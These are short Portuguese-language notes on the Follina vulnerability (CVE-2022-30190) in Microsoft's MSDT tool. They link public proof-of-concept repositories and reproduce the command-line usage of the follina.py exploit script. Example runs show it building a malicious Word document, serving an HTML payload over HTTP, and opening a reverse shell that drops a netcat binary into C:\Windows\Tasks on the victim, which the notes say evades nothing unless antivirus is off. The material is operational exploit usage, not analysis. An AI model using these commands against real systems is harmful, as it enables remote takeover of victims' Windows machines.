
Notas relacionadas ao CVE-2022-30190
Notas relacionadas ao CVE-2022-30190
FOLLINA: CVE-2022-30190
Usa a Ferramenta de Diagnóstico de Suporte da Microsoft (MSDT)
Explora a janela de diagnóstico aberta para Diagnóstico e, quando executada corretamente, fornece uma reverse shell ao atacante.
GitHub: (a). https://github.com/JohnHammond/msdt-follina (b). https://github.com/chvancooten/follina.py
Agradecimentos a: (a). @_johnhammond (b). @networkchuck
Uso follina.py [-h] [--command COMMAND] [--output OUTPUT] [--interface INTERFACE] [--port PORT] options: -h, --help mostra esta mensagem de ajuda e sai --command COMMAND, -c COMMAND comando a ser executado no alvo (padrão: calc) --output OUTPUT, -o OUTPUT arquivo maldoc de saída (padrão: ./follina.doc) --interface INTERFACE, -i INTERFACE interface de rede ou endereço IP para hospedar o servidor HTTP (padrão: eth0) --port PORT, -p PORT porta para servir o servidor HTTP (padrão: 8000)
Exemplos
(a). Executar calc.exe:
$ python3 follina.py
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
(b). Executar notepad.exe:
$ python3 follina.py -c "notepad"
(c). Obter uma reverse shell na porta 9001.
Nota: isso baixa um binário netcat na vítima e o coloca em C:\Windows\Tasks. Ele não limpa o binário. Isso acionará detecções de antivírus a menos que o AV esteja desabilitado.
$ python3 follina.py -r 9001